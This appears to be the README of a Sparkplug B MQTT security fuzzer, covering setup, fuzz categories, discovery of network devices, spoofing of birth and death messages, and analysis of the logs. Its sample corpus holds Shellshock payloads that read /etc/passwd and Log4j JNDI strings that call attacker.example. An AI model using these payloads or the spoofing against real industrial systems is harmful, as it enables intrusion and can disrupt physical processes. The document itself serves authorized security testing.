BishopFox/sparkplugFuzzer

Sparkplug B MQTT Security Fuzzer

A comprehensive security assessment tool for testing Sparkplug B MQTT protocol implementations. The fuzzer systematically tests all protocol fields across all 9 message types, discovers live devices on the network, and produces detailed logs for analysis.

Responsible Use

This tool sends malformed, injection, and protocol-violating MQTT messages to a target broker. Only run it against systems you own or have explicit written authorization to test. Sparkplug B brokers commonly sit in OT/ICS environments where unexpected payloads can disrupt physical processes — assume every target is production-adjacent unless proven otherwise.

If you discover a vulnerability in a Sparkplug B implementation using this tool, please follow coordinated disclosure with the affected vendor. To report a security issue in this tool itself, see SECURITY.md.

Overview

The Sparkplug B specification defines a topic namespace and payload format built on MQTT and Google Protocol Buffers for Industrial IoT (IIoT) environments. This fuzzer assesses the security and robustness of Sparkplug B implementations by:

  • Testing all 19 metric data types with boundary values and overflow conditions
  • Injecting malicious strings (XSS, SQLi, format strings, path traversal, command injection)
  • Creating type mismatches between declared datatypes and actual protobuf value fields
  • Violating protocol state machine ordering (data before birth, double births, data after death)
  • Corrupting serialized protobuf payloads at the binary level
  • Spoofing birth/death certificates for discovered network devices
  • Fuzzing MQTT topic namespaces with special characters, case variations, and structural violations

Prerequisites

  • Python 3.8+
  • MQTT Broker — the target system under test (e.g., Mosquitto, HiveMQ, EMQX, or any Sparkplug B aware broker)
  • Authorization — this tool is intended for authorized security testing only

Installation

On modern Debian/Ubuntu/Kali (PEP-668 systems), --setup cannot pip install into the system Python — use a virtual environment or pipx first. The recommended path:

python3 -m venv .venv
source .venv/bin/activate
python3 sparkplug-fuzzer.py --setup

Or run via pipx run if you prefer not to manage the venv yourself. On older systems without PEP-668 enforcement, plain python3 sparkplug-fuzzer.py --setup works directly.

--setup will:

  1. Install pip dependencies (paho-mqtt, protobuf)
  2. Clone a pinned tag of the Eclipse Tahu repository (see TAHU_REF in the script)
  3. Copy sparkplug_b.py and array_packer.py helper modules
  4. Compile sparkplug_b.proto into Python bindings (uses protoc if available, falls back to grpcio-tools)
  5. Clean up the Tahu clone

After setup, your directory should contain:

sparkplug-fuzzer.py     # The fuzzer
sparkplug_b.py          # Sparkplug B helper module (from Tahu)
array_packer.py         # Array packing helper (from Tahu)
sparkplug_b_pb2.py      # Generated protobuf bindings
requirements.txt        # Python dependencies

Manual setup (if --setup doesn't work)

pip install -r requirements.txt
git clone https://github.com/eclipse/tahu.git
cp tahu/python/core/sparkplug_b.py .
cp tahu/python/core/array_packer.py .
cp tahu/sparkplug_b/sparkplug_b.proto .   # proto location in the Tahu tree; adjust if your checkout differs
protoc --python_out=. sparkplug_b.proto
rm -rf tahu

Quick Start

python3 sparkplug-fuzzer.py --setup              # first-time setup
python3 sparkplug-fuzzer.py -H localhost -p 1883 -v  # run fuzzer

This will:

  1. Connect to the broker at localhost:1883
  2. Listen for 10 seconds to discover existing Sparkplug devices
  3. Establish the fuzzer as a Sparkplug node/device
  4. Run all 12 fuzz categories (~635+ test cases)
  5. Target any discovered devices with spoofed messages
  6. Write results to sparkplug_fuzz.jsonl inside the per-run output directory (./sparkplug-runs/<UTC-ts>_<host>/ by default)

Usage

Command-Line Options

python3 sparkplug-fuzzer.py [OPTIONS]
| Option | Default | Description |
| --- | --- | --- |
| -H, --host | localhost | MQTT broker hostname or IP |
| -p, --port | 1883 (or 8883 with --tls) | MQTT broker port |
| -u, --username | None | MQTT username (also reads MQTT_USERNAME env var) |
| -P, --password | None | MQTT password (also reads MQTT_PASSWORD; pass - to read from stdin without echo) |
| --tls | off | Connect over TLS; default port becomes 8883 if -p unset |
| --cafile | None | CA bundle for TLS server certificate verification |
| --insecure | off | Skip TLS hostname/certificate verification (testing only) |
| -g, --group | Sparkplug B Devices | Sparkplug group ID the fuzzer registers under |
| -n, --node | FuzzNode | Sparkplug edge node ID for the fuzzer |
| -d, --device | FuzzDevice | Sparkplug device ID for the fuzzer |
| -c, --categories | all | Space-separated list of fuzz categories to run |
| --discovery-time | 10 | Seconds to passively listen for network discovery |
| --delay | 0.1 | Delay in seconds between fuzz messages |
| --probe-anon-write | off | During discovery, send one QoS=1 publish to confirm whether the broker accepts unauthenticated PUBLISH |
| -l, --log | sparkplug_fuzz.jsonl | Output log file name (relative paths land inside --output-dir; absolute paths are honored as-is) |
| --output-dir | ./sparkplug-runs/<UTC-ts>_<host>/ | Per-run output directory. Created if absent. |
| -v, --verbose | 0 | Increase console verbosity (-v = info, -vv = debug). -vv also surfaces fuzz-generator skips. The paho.mqtt logger, throttled to WARNING by default, rises to INFO under -v and DEBUG under -vv. |
| --setup | | Install all dependencies and exit |
| --tahu-path | | Path to a local clone of eclipse/tahu (or its python/core directory). Used by --setup in air-gapped environments instead of git clone. |
| --extra-string-payloads | | Path to a file of additional string-injection payloads (one per line, UTF-8). Appended to the built-in STRING_FUZZ_VALUES; does not replace them. Max 10 MB / 10,000 payloads. See Custom string corpora. |

Fuzz Categories

| Category | Description | Approx. Cases |
| --- | --- | --- |
| boundary | Min/max/overflow for all 19 metric data types, is_null with values, flag combinations | ~200 |
| string | Injection payloads (XSS, SQLi, format strings, path traversal, command injection, null bytes) across String, Text, UUID, MetaData fields, and STATE messages | ~100 |
| type_mismatch | Declared datatype vs wrong protobuf value field, invalid datatype codes, multiple oneof fields | ~150 |
| sequence | Sequence gaps, duplicates, backwards, rollover, bdSeq mismatch between NBIRTH/NDEATH | ~20 |
| timestamp | Zero, max uint64, far future/past, metric vs payload timestamp inconsistency, DateTime extremes | ~15 |
| alias | Duplicate aliases for different metrics, extreme alias values, undefined aliases in data messages | ~15 |
| orphan | Data/commands targeting non-existent devices, nodes, groups; undefined template references | ~20 |
| ordering | Protocol state violations: data before birth, double births, data after death, wrong birth order | ~15 |
| recursive | Nested PropertySet chains (depth 1-100), key/value length mismatches, PropertySetList variations | ~15 |
| dataset | Column count mismatches, row element mismatches, type violations, empty/huge datasets, special chars in column names | ~25 |
| malformed | Binary protobuf corruption: truncation, bit flips, random bytes, overlong varints, wrong message classes | ~30 |
| topic | Case variations, wrong versions, extra/missing slashes, special characters, wildcards in topic strings | ~30 |
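
The malformed category lists overlong varints among its corruptions. As a rough illustration of what that means at the wire level, the sketch below encodes a protobuf base-128 varint and can pad it with redundant continuation groups so the same value occupies more bytes than necessary. The function names encode_varint and decode_varint are hypothetical and are not taken from the fuzzer; this is not necessarily how the tool builds its cases.

```python
def encode_varint(value: int, min_bytes: int = 1) -> bytes:
    """Encode a non-negative int as a protobuf base-128 varint.

    If min_bytes exceeds the canonical length, the encoding is padded with
    zero-valued groups, giving an overlong (non-canonical) form of the value.
    """
    if value < 0:
        raise ValueError("varints encode non-negative integers only")
    groups = []
    while True:
        groups.append(value & 0x7F)  # low 7 bits first (little-endian groups)
        value >>= 7
        if value == 0:
            break
    while len(groups) < min_bytes:   # pad to the requested length
        groups.append(0)
    # Every byte except the last carries the continuation bit (0x80).
    return bytes(g | 0x80 for g in groups[:-1]) + bytes([groups[-1]])


def decode_varint(data: bytes) -> int:
    """Decode a varint, stopping at the first byte without the continuation bit."""
    result = 0
    for position, byte in enumerate(data):
        result |= (byte & 0x7F) << (7 * position)
        if not byte & 0x80:
            break
    return result


canonical = encode_varint(1)              # one byte
overlong = encode_varint(1, min_bytes=3)  # three bytes, same value
```

A lenient parser decodes both forms to the same integer, while a strict one may reject the padded form; that difference in behavior is what such a case is meant to surface.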

Examples

Run all categories with authentication:

python3 sparkplug-fuzzer.py -H 10.0.1.30 -p 1883 -u admin -P secret -v

Pass credentials without exposing them in ps:

# Via environment
MQTT_USERNAME=admin MQTT_PASSWORD=secret python3 sparkplug-fuzzer.py -H broker.local

# Or read password from stdin (getpass — no echo)
python3 sparkplug-fuzzer.py -H broker.local -u admin -P -

Connect over TLS:

# System trust store, default port 8883
python3 sparkplug-fuzzer.py -H broker.example.com --tls -v

# Custom CA bundle
python3 sparkplug-fuzzer.py -H broker.example.com --tls --cafile ./ca.pem -v

Passive auth assessment + active write probe:

python3 sparkplug-fuzzer.py -H 10.0.1.30 --probe-anon-write -v

Run only injection-related categories:

python3 sparkplug-fuzzer.py -H broker.local -c string type_mismatch malformed

Extended discovery with slow pacing (minimize broker load):

python3 sparkplug-fuzzer.py -H 192.168.1.100 --discovery-time 60 --delay 0.5

Custom group/node identity and log file:

python3 sparkplug-fuzzer.py -H broker.local \
  -g "Production Floor" -n "TestNode01" -d "TestDevice01" \
  -l production_fuzz_results.jsonl -vv

Monitor broker traffic in a separate terminal:

mosquitto_sub -h <broker_host> -p 1883 -t 'spBv1.0/#' -F '%I %t %x'

Air-gapped setup with a pre-cloned Tahu repo:

git clone https://github.com/eclipse/tahu.git ~/tahu   # on a connected box
# transfer ~/tahu to the air-gapped target, then on the target:
python3 sparkplug-fuzzer.py --setup --tahu-path ~/tahu

Per-run output layout:

# Default — directory is auto-named under ./sparkplug-runs/
python3 sparkplug-fuzzer.py -H broker.local
# -> creates ./sparkplug-runs/2026-05-05_1830_broker.local/sparkplug_fuzz.jsonl

# Explicit directory:
python3 sparkplug-fuzzer.py -H broker.local --output-dir ./fuzz-runs/acme-2026Q2
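
The path rules described for --output-dir and --log can be sketched as follows. This is an illustration under assumptions, not the script's code: the helper names default_run_dir and resolve_log_path are hypothetical, and the timestamp format is inferred from the example directory name above.

```python
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional


def default_run_dir(host: str, now: Optional[datetime] = None,
                    base: str = "sparkplug-runs") -> Path:
    """Build <base>/<UTC-ts>_<host>, with the timestamp rendered in UTC."""
    now = now or datetime.now(timezone.utc)
    # Assumed format, inferred from "2026-05-05_1830_broker.local"
    stamp = now.astimezone(timezone.utc).strftime("%Y-%m-%d_%H%M")
    return Path(base) / f"{stamp}_{host}"


def resolve_log_path(log_name: str, output_dir: Path) -> Path:
    """Relative log names land inside output_dir; absolute paths are kept as-is."""
    log = Path(log_name)
    return log if log.is_absolute() else output_dir / log


run_dir = default_run_dir("broker.local")
log_path = resolve_log_path("sparkplug_fuzz.jsonl", run_dir)
```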

Custom string corpora

The built-in STRING_FUZZ_VALUES covers the classic injection categories (empty / huge strings, null bytes, format strings, XSS, SQLi, path traversal, prototype pollution). Real engagements often need second-order payloads aimed at whatever consumes the broker's data downstream — historians piping metric names through shell, Java-based SCADA hosts feeding values into log4j, dashboards rendering tag names in HTML, etc.

The --extra-string-payloads <FILE> flag appends an additional corpus to the built-ins. Format is one payload per line, UTF-8. Whitespace-only lines are kept (often intentional in fuzz); fully blank lines are dropped. The flag adds to the built-in list rather than replacing it, so existing coverage is preserved.

# corpus.txt — Shellshock + Log4j JNDI prefixes
cat > corpus.txt <<'EOF'
() { :;}; /bin/cat /etc/passwd
() { :; }; echo VULN
${jndi:ldap://attacker.example/x}
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}
${${lower:jndi}:ldap://attacker.example/x}
EOF

python3 sparkplug-fuzzer.py -H broker.local --extra-string-payloads corpus.txt -v

The fuzzer prints [+] Extra string payloads: loaded N from <path> at startup, and each payload is emitted through every place that iterates STRING_FUZZ_VALUES — primarily the string category, but also the type-mismatch generator's string-typed cases.

Hard limits: 10 MB file size, 10,000 payloads. Adjust MAX_EXTRA_PAYLOADS_FILE_SIZE / MAX_EXTRA_PAYLOADS_COUNT at the top of the script if you need more (and have the run-time budget to match).
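
The corpus rules above (UTF-8, one payload per line, whitespace-only lines kept, blank lines dropped, size and count limits) can be sketched in a few lines. The function name load_extra_payloads is hypothetical; the two constants reuse the names mentioned above with the documented default values. Treat this as a reading aid rather than the script's actual loader.

```python
import os

MAX_EXTRA_PAYLOADS_FILE_SIZE = 10 * 1024 * 1024  # 10 MB
MAX_EXTRA_PAYLOADS_COUNT = 10_000


def load_extra_payloads(path: str) -> list:
    """Read one payload per line, enforcing the file-size and count limits."""
    if os.path.getsize(path) > MAX_EXTRA_PAYLOADS_FILE_SIZE:
        raise ValueError(f"{path}: file exceeds {MAX_EXTRA_PAYLOADS_FILE_SIZE} bytes")
    payloads = []
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            payload = line.rstrip("\n")  # strip only the line terminator
            if payload == "":
                continue                 # fully blank line: dropped
            payloads.append(payload)     # whitespace-only lines are kept
            if len(payloads) > MAX_EXTRA_PAYLOADS_COUNT:
                raise ValueError(f"{path}: more than {MAX_EXTRA_PAYLOADS_COUNT} payloads")
    return payloads
```

Stripping only the newline, rather than calling strip(), is what preserves leading and trailing whitespace inside a payload.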

v0.2 release notes

  • --output-dir flag plus auto-created ./sparkplug-runs/<UTC-ts>_<host>/ default — every run lands in its own directory so artifacts don't collide between runs.
  • --tahu-path flag for --setup — points at a local clone of eclipse/tahu for air-gapped test environments where outbound git clone is blocked. The local source is never deleted on cleanup.
  • Console + JSONL timestamps forced to UTC with explicit Z suffix so cross-correlation with broker logs is timezone-arithmetic-free.
  • paho.mqtt logger throttled to WARNING by default; visible at INFO under -v, DEBUG under -vv. Per-packet client telemetry no longer drowns out fuzz signal.
  • pytest test harness under tests/ — 23 tests covering FuzzLogger, topic helper, output path resolution, and --tahu-path validation. See Running the tests.

Running the tests

The test harness covers the network-independent surface (logger correctness, topic builder, output-path resolution, --tahu-path parsing) and runs without a broker, paho-mqtt, or protobuf installed.

pip install -r requirements-dev.txt
pytest tests/

Expected: 23 passed. Network-dependent paths (PayloadBuilder protobuf, fuzz publishers, MQTT lifecycle) are deliberately deferred to a future integration-test layer with a containerized broker.

How It Works

Execution Flow

1. CONNECT      Connect to MQTT broker with NDEATH as last-will-and-testament
                Subscribe to spBv1.0/# and STATE/# for discovery
                    |
2. DISCOVER     Passively listen for Sparkplug traffic (configurable duration)
                Build map of groups, nodes, devices, and their metric definitions
                    |
3. ESTABLISH    Publish fuzzer's own NBIRTH + DBIRTH to register as a valid node
                    |
4. FUZZ         Run selected categories sequentially
                Each category generator yields (topic, payload, description) tuples
                Every publish logged via centralized _publish() method
                Configurable delay between messages
                    |
5. TARGET       For each discovered node/device:
                  - Spoof NDEATH (kill node)
                  - Spoof NBIRTH (impersonate node)
                  - Spoof DDEATH/DBIRTH (kill/impersonate device)
                  - Send DCMD/NCMD with fuzzed metric values
                    |
6. REPORT       Print summary (total TX/RX counts by category)
                Close log file, disconnect

Network Discovery

During the discovery phase, the fuzzer subscribes to spBv1.0/# and STATE/# and listens for all Sparkplug traffic. The DeviceTracker component parses observed messages to build a live network map:

  • NBIRTH messages reveal edge nodes and their metric definitions (name, alias, datatype)
  • DBIRTH messages reveal devices and their metric schemas
  • NDEATH/DDEATH messages track node/device lifecycle state
  • STATE messages reveal host applications and their online/offline status

This map is used in the targeted fuzzing phase to send contextually relevant attacks against real devices with their actual metric schemas.
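
To make the discovery step concrete, here is a minimal sketch of how observed topics could be turned into a network map. It handles only the topic string, not the protobuf payload, and the names parse_topic, ParsedTopic, and update_network_map are hypothetical; the real DeviceTracker may be organized quite differently.

```python
from typing import NamedTuple, Optional

NODE_TYPES = {"NBIRTH", "NDEATH", "NDATA", "NCMD"}
DEVICE_TYPES = {"DBIRTH", "DDEATH", "DDATA", "DCMD"}


class ParsedTopic(NamedTuple):
    msg_type: str
    group: Optional[str] = None
    node: Optional[str] = None
    device: Optional[str] = None
    host_id: Optional[str] = None


def parse_topic(topic: str) -> Optional[ParsedTopic]:
    """Split a Sparkplug topic into its parts; return None if it doesn't fit."""
    parts = topic.split("/")
    if len(parts) == 2 and parts[0] == "STATE":
        return ParsedTopic("STATE", host_id=parts[1])
    if len(parts) < 4 or parts[0] != "spBv1.0":
        return None
    _, group, msg_type, node, *rest = parts
    if msg_type in NODE_TYPES and not rest:
        return ParsedTopic(msg_type, group, node)
    if msg_type in DEVICE_TYPES and len(rest) == 1:
        return ParsedTopic(msg_type, group, node, rest[0])
    return None


def update_network_map(network: dict, topic: str) -> None:
    """Track lifecycle state per (group, node, device) key."""
    parsed = parse_topic(topic)
    if parsed is None or parsed.msg_type == "STATE":
        return
    key = (parsed.group, parsed.node, parsed.device)
    if parsed.msg_type.endswith("BIRTH"):
        network[key] = "online"
    elif parsed.msg_type.endswith("DEATH"):
        network[key] = "offline"
    else:
        network.setdefault(key, "seen")  # data/command seen before any birth
```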

Authentication Assessment

When the fuzzer connects without -u/-P (and MQTT_USERNAME/MQTT_PASSWORD aren't set), it derives a broker auth posture from passive discovery alone. This produces a single AUTH_ASSESSMENT event in the log and a printed summary:

| Signal | What it means | How it's derived |
| --- | --- | --- |
| anon_connect_accepted | Broker accepted CONNECT without credentials | The fuzzer's own CONNECT succeeded |
| anon_subscribe_accepted | Broker forwards spBv1.0/# / STATE/# to anonymous clients | At least one RX message arrived during the listen window |
| anon_publish_accepted | Broker accepts PUBLISH from anonymous clients | Set only if --probe-anon-write is passed; QoS=1 probe + PUBACK wait |
| unauth_endpoints | Nodes / devices / host applications observable without auth | Every entity in the discovered network map (the fuzzer never presented credentials) |

The QoS=1 probe is opt-in because it crosses from passive into active. With QoS=0 the broker silently drops messages it would deny, so confirming write-accept requires reading a PUBACK.

MQTT/Sparkplug have no per-endpoint auth — auth is a broker-level concern. So "endpoints observable without authentication" is reported as a list of targets reachable at zero cost rather than as a property of the endpoints themselves.

Targeted Fuzzing

After systematic fuzzing, the tool targets each discovered device with:

  1. Spoofed death notices — publishes NDEATH/DDEATH to trick subscribers into thinking devices went offline
  2. Spoofed birth certificates — publishes NBIRTH/DBIRTH to impersonate discovered nodes/devices
  3. Command injection — sends NCMD/DCMD messages with boundary values for each known metric, testing whether the target validates inbound commands
  4. Rebirth commands — sends Node Control/Rebirth NCMD to trigger devices to republish their births

Output and Log Analysis

Log Format

The log file uses JSON-lines format (.jsonl) — one JSON object per line, suitable for analysis with jq, Python, or any JSON-capable tool.

Payloads larger than 64 KiB are not hex-inlined; instead payload_hex carries sha256:<digest>+len=<n> so the log stays bounded for very large fuzz cases. payload_len is always present.
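
The bounding rule can be illustrated with a short sketch. The helper name payload_fields and the constant INLINE_LIMIT are hypothetical; only the 64 KiB threshold and the sha256:<digest>+len=<n> format come from the description above.

```python
import hashlib

INLINE_LIMIT = 64 * 1024  # payloads larger than this are summarized, not inlined


def payload_fields(payload: bytes) -> dict:
    """Return the payload_hex / payload_len pair for one log record."""
    if len(payload) > INLINE_LIMIT:
        digest = hashlib.sha256(payload).hexdigest()
        hex_field = f"sha256:{digest}+len={len(payload)}"
    else:
        hex_field = payload.hex()
    return {"payload_hex": hex_field, "payload_len": len(payload)}
```

When analyzing logs, a payload_hex value that starts with sha256: therefore signals a summarized payload rather than raw hex.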

TX record (outbound fuzz message):

{
  "ts": "2026-04-10T15:30:00.123456Z",
  "dir": "TX",
  "case_id": "BOUNDARY-0042",
  "category": "boundary",
  "topic": "spBv1.0/Sparkplug B Devices/DDATA/FuzzNode/FuzzDevice",
  "payload_hex": "0800120a0a06...",
  "payload_len": 28,
  "payload_decoded": {"timestamp": 1712345678000, "metrics": [{"name": "fuzz/boundary/Int32", "datatype": 3, "int_value": 2147483647}]},
  "description": "Boundary Int32 = 2147483647 (int_value)"
}

RX record (inbound message from network):

{
  "ts": "2026-04-10T15:30:01.456789Z",
  "dir": "RX",
  "topic": "spBv1.0/Production/NBIRTH/PLC01",
  "payload_hex": "0800120f...",
  "payload_len": 156,
  "payload_decoded": {"timestamp": 1712345679000, "metrics": [{"name": "Node Control/Rebirth", "datatype": 11, "boolean_value": false}]}
}

Event record (system event):

{
  "ts": "2026-04-10T15:29:50.000000Z",
  "dir": "EVENT",
  "event": "DISCOVERY_COMPLETE",
  "details": {"groups": ["Production"], "node_count": 3, "device_count": 7, "targets": 10}
}

Analyzing Results

Count cases by category:

jq -r 'select(.dir == "TX") | .category' sparkplug_fuzz.jsonl | sort | uniq -c | sort -rn

Extract all string injection cases:

jq 'select(.category == "string")' sparkplug_fuzz.jsonl

Show the discovery summary (groups, node and device counts):

jq 'select(.event == "DISCOVERY_COMPLETE")' sparkplug_fuzz.jsonl

Find cases that triggered broker disconnects:

jq 'select(.event == "UNEXPECTED_DISCONNECT" or .event == "RECONNECT_FAIL")' sparkplug_fuzz.jsonl

Pull the authentication assessment:

jq 'select(.event == "AUTH_ASSESSMENT")' sparkplug_fuzz.jsonl

List endpoints reachable without authentication:

jq -r 'select(.event == "AUTH_ASSESSMENT") | .details.unauth_endpoints[] | [.kind, .group, .node, .device, .host_id, .status] | @tsv' sparkplug_fuzz.jsonl

Get TX count per second (for rate analysis):

jq -r 'select(.dir == "TX") | .ts[:19]' sparkplug_fuzz.jsonl | uniq -c

Export all topics that were published to:

jq -r 'select(.dir == "TX") | .topic' sparkplug_fuzz.jsonl | sort -u

Analyze with Python:

import json

# Load every record; skip blank lines so a stray newline doesn't break parsing
with open("sparkplug_fuzz.jsonl", encoding="utf-8") as f:
    records = [json.loads(line) for line in f if line.strip()]

# Split by direction; .get() tolerates records that lack a "dir" key
tx = [r for r in records if r.get("dir") == "TX"]
rx = [r for r in records if r.get("dir") == "RX"]
events = [r for r in records if r.get("dir") == "EVENT"]

print(f"Total TX: {len(tx)}, RX: {len(rx)}, Events: {len(events)}")

# Find any decode errors in received messages (possible crash indicators)
errors = [r for r in rx if "_decode_error" in str(r.get("payload_decoded", {}))]
print(f"Decode errors in RX: {len(errors)}")
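
A common follow-up is to ask which fuzz case was sent just before the broker dropped the connection. The sketch below pairs each disconnect-type event with the most recent TX record, assuming records appear in the file in chronological order. The function name last_tx_before_events is hypothetical, and the preceding case is only a starting point for triage, not proof of cause.

```python
def last_tx_before_events(records,
                          event_names=("UNEXPECTED_DISCONNECT", "RECONNECT_FAIL")):
    """Pair each matching EVENT record with the TX record that preceded it."""
    pairs = []
    last_tx = None
    for rec in records:  # assumed to be in log (chronological) order
        if rec.get("dir") == "TX":
            last_tx = rec
        elif rec.get("dir") == "EVENT" and rec.get("event") in event_names:
            pairs.append((rec, last_tx))
    return pairs


# Example with in-memory records shaped like the log entries above
sample = [
    {"dir": "TX", "case_id": "MALFORMED-0007", "description": "truncated payload"},
    {"dir": "EVENT", "event": "UNEXPECTED_DISCONNECT"},
]
for event, tx_rec in last_tx_before_events(sample):
    case = tx_rec["case_id"] if tx_rec else "(no TX yet)"
    print(f"{event['event']} followed case {case}")
```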

Protocol Coverage

Message Types

All 9 Sparkplug B message types are tested:

| Message Type | Topic Pattern | Description | Fuzzer Usage |
| --- | --- | --- | --- |
| NBIRTH | spBv1.0/{group}/NBIRTH/{node} | Node birth certificate | Establishes fuzzer presence; spoofed for discovered nodes; ordering tests |
| NDEATH | spBv1.0/{group}/NDEATH/{node} | Node death notification | MQTT last-will; spoofed for discovered nodes; ordering tests |
| DBIRTH | spBv1.0/{group}/DBIRTH/{node}/{device} | Device birth certificate | Establishes fuzzer device; spoofed for discovered devices; ordering tests |
| DDEATH | spBv1.0/{group}/DDEATH/{node}/{device} | Device death notification | Spoofed for discovered devices; ordering tests; orphan tests |
| NDATA | spBv1.0/{group}/NDATA/{node} | Node data update | Boundary values; sequence numbers; ordering tests |
| DDATA | spBv1.0/{group}/DDATA/{node}/{device} | Device data update | Primary vehicle for most fuzz categories |
| NCMD | spBv1.0/{group}/NCMD/{node} | Node command | Targeted fuzzing (rebirth commands); orphan tests |
| DCMD | spBv1.0/{group}/DCMD/{node}/{device} | Device command | Targeted fuzzing against discovered device metrics; orphan tests |
| STATE | STATE/{host_id} | Host application state (JSON) | Malformed JSON injection |

Data Types

All 19 Sparkplug B metric data types are tested with type-specific boundary values:

| Code | Type | Protobuf Field | Boundary Values Tested |
| --- | --- | --- | --- |
| 1 | Int8 | int_value | 0, -128, 127, 128 (overflow), -129 (underflow) |
| 2 | Int16 | int_value | 0, -32768, 32767, overflow/underflow |
| 3 | Int32 | int_value | 0, -2^31, 2^31-1, overflow/underflow |
| 4 | Int64 | long_value | 0, -2^63, 2^63-1, overflow |
| 5 | UInt8 | int_value | 0, 255, 256, -1 |
| 6 | UInt16 | int_value | 0, 65535, 65536, -1 |
| 7 | UInt32 | int_value | 0, 4294967295, -1 |
| 8 | UInt64 | long_value | 0, 2^64-1, -1 |
| 9 | Float | float_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 10 | Double | double_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 11 | Boolean | boolean_value | True, False; also tested with raw int values (0, 1, 2, 255) |
| 12 | String | string_value | Empty, long (up to 64KB), injection payloads |
| 13 | DateTime | long_value | Epoch, max, far future/past |
| 14 | Text | string_value | Same injection payloads as String |
| 15 | UUID | string_value | Empty, valid, invalid format, injections |
| 16 | DataSet | dataset_value | Structural violations via dataset category |
| 17 | Bytes | bytes_value | Empty, null bytes, random, large |
| 18 | File | bytes_value | Empty, magic bytes, large |
| 19 | Template | template_value | Undefined references, orphan templates |
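
The integer rows above follow one pattern: zero, the type's minimum and maximum, and one step past each limit. A small sketch of that pattern, using a hypothetical helper int_boundaries (the fuzzer's own value tables may be hand-written instead, and some rows list fewer values than this helper yields):

```python
def int_boundaries(bits: int, signed: bool) -> list:
    """Return zero, min, max, max+1 (overflow), and min-1 (underflow)."""
    if signed:
        lo, hi = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    else:
        lo, hi = 0, (1 << bits) - 1
    values = [0, lo, hi, hi + 1, lo - 1]
    # dict.fromkeys removes the duplicate zero for unsigned types, keeping order
    return list(dict.fromkeys(values))


int8_cases = int_boundaries(8, signed=True)    # matches the Int8 row
uint8_cases = int_boundaries(8, signed=False)  # matches the UInt8 row
```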

Field Coverage

The fuzzer covers 87+ unique protobuf field paths including:

  • Payload root fields: timestamp, seq, uuid, body, metrics
  • Metric fields: name, alias, timestamp, datatype, is_historical, is_transient, is_null, metadata, properties, and all value oneof variants
  • MetaData fields: is_multi_part, content_type, size, seq, file_name, file_type, md5, description
  • PropertySet/PropertyValue: keys, values, type, is_null, recursive propertyset_value, propertysets_value
  • DataSet: num_of_columns, columns, types, rows, elements, all DataSetValue variants
  • Template: version, template_ref, is_definition, nested metrics, parameters

Architecture

The fuzzer is a single Python file organized into these components:

sparkplug-fuzzer.py
    |
    +-- Constants / ALL_METRIC_TYPES / STRING_FUZZ_VALUES
    |       Type definitions and fuzz value tables
    |
    +-- FuzzLogger
    |       JSON-lines file logging + console output
    |       Protobuf payload decoding
    |
    +-- DeviceTracker
    |       Passive network discovery
    |       Tracks groups, nodes, devices, metrics
    |
    +-- PayloadBuilder
    |       Valid payload construction (sparkplug_b helpers)
    |       Raw payload construction (sparkplug_b_pb2 direct)
    |       Binary corruption (truncate, flip, append)
    |
    +-- 12 Fuzz Generators
    |       Each is a Python generator yielding (topic, bytes, desc)
    |       Covers boundary, string, type, seq, timestamp, alias,
    |       orphan, ordering, recursive, dataset, malformed, topic
    |
    +-- SparkplugFuzzer
    |       Orchestration: connect, discover, fuzz, target, report
    |       Centralized publish with logging
    |       Auto-reconnect on disconnect
    |
    +-- CLI (argparse) + main()
            Argument parsing and entry point

The two-level payload construction is a key design decision:

  • High-level (PayloadBuilder.node_birth(), etc.) uses sparkplug_b helper functions to build valid, well-formed payloads. Used for establishing presence and targeted spoofing.
  • Low-level (PayloadBuilder.raw_payload(), corrupt_bytes()) directly manipulates sparkplug_b_pb2 protobuf objects or raw bytes, bypassing validation. Used for intentionally malformed payloads that test parser error handling and edge cases.
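
The binary corruption named in the architecture outline (truncate, flip, append) operates on already-serialized bytes, so it can be sketched without any protobuf dependency. The function names below are hypothetical stand-ins, not the signatures of the fuzzer's corrupt_bytes().

```python
import random


def truncate(payload: bytes, keep: int) -> bytes:
    """Keep only the first `keep` bytes, cutting fields mid-encoding."""
    return payload[:max(0, keep)]


def flip_bit(payload: bytes, bit_index: int) -> bytes:
    """Invert a single bit; the index wraps around the payload length."""
    if not payload:
        return payload
    buf = bytearray(payload)
    byte_i, bit_i = divmod(bit_index % (len(buf) * 8), 8)
    buf[byte_i] ^= 1 << bit_i
    return bytes(buf)


def append_random(payload: bytes, count: int, rng: random.Random) -> bytes:
    """Append `count` random bytes after a valid message."""
    # getrandbits is used instead of Random.randbytes to stay compatible with Python 3.8
    return payload + bytes(rng.getrandbits(8) for _ in range(count))


valid = bytes.fromhex("0800120a")  # a short, arbitrary byte string for illustration
rng = random.Random(1234)          # seeded so corrupted cases are reproducible
cases = [truncate(valid, 2), flip_bit(valid, 3), append_random(valid, 4, rng)]
```

Seeding the random generator is a deliberate choice in this sketch: a corrupted case that crashes a parser is only useful if it can be regenerated.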

License

This project is licensed under the MIT License — see LICENSE for the full text.

Third-Party

sparkplug-fuzzer.py --setup fetches the following components from Eclipse Tahu at install time and copies them into the working directory:

  • sparkplug_b.py — Sparkplug B helper module
  • array_packer.py — Array packing helper
  • sparkplug_b.proto — Protocol Buffer definition (used to generate sparkplug_b_pb2.py)

Eclipse Tahu is distributed under the Apache License, Version 2.0. None of the Tahu source files are redistributed in this repository. See NOTICE for the full attribution.
